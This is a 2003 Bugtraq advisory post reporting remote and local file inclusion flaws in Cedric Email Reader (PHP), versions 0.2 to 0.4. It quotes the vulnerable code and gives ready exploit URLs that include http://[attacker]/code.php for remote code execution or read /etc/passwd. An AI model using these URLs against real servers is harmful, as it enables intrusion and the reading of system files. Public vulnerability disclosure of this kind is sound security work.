Bugtraq mailing list archives

Cedric Email Reader (PHP)

From: MGhz <magas () mail lt>
Date: 9 Feb 2003 10:05:59 -0000


Version : 0.2;0.3;0.4 
Website : http://www.isoca.com/ 
Problems :Include file (local, remote)

Version: 0.2;0.3

File: 
--------------------------------- 
email.php3 (version 0.2) ; email.php (version 0.3)
---------------------------------

PHP Code:
--------------------------------- 
[...]
require('emailreader.ini');
if ($login > "") {
 parse_str($param);
 include($cer_skin);
 include('email.inc');
 $mbox = openimap($server, $username, $password);
 $text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------

Exploit : 
--------------------------------- 
http://[target]/email.php?login=attacker&cer_skin=http://
[attacker]/code.php 
--> 
include http://[attacker]/code.php on remote server 
---
include local file 
-->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd 
--------------------------------- 

Versions: 0.4

File: 
--------------------------------- 
webmail/lib/emailreader_execute_on_each_page.inc.php
---------------------------------

PHP Code:
--------------------------------- 
[...]
$param = imap_base64($login);
parse_str($param);

@include($emailreader_ini);
@include('lib/'.$server_type.'.inc.php');
@include('skin/emailreaderskin_'.$lang.'.php');
[...]
--------------------------------- 

Exploit : 
--------------------------------- 
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=http://[attacker]/code.php
--> 
include http://[attacker]/code.php on remote server
---
include local file 
-->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=/etc/passwd 
---------------------------------


--
(if registers_global=ON)
--

--
magas () mail lt
Current thread:

Cedric Email Reader (PHP) MGhz (Feb 10)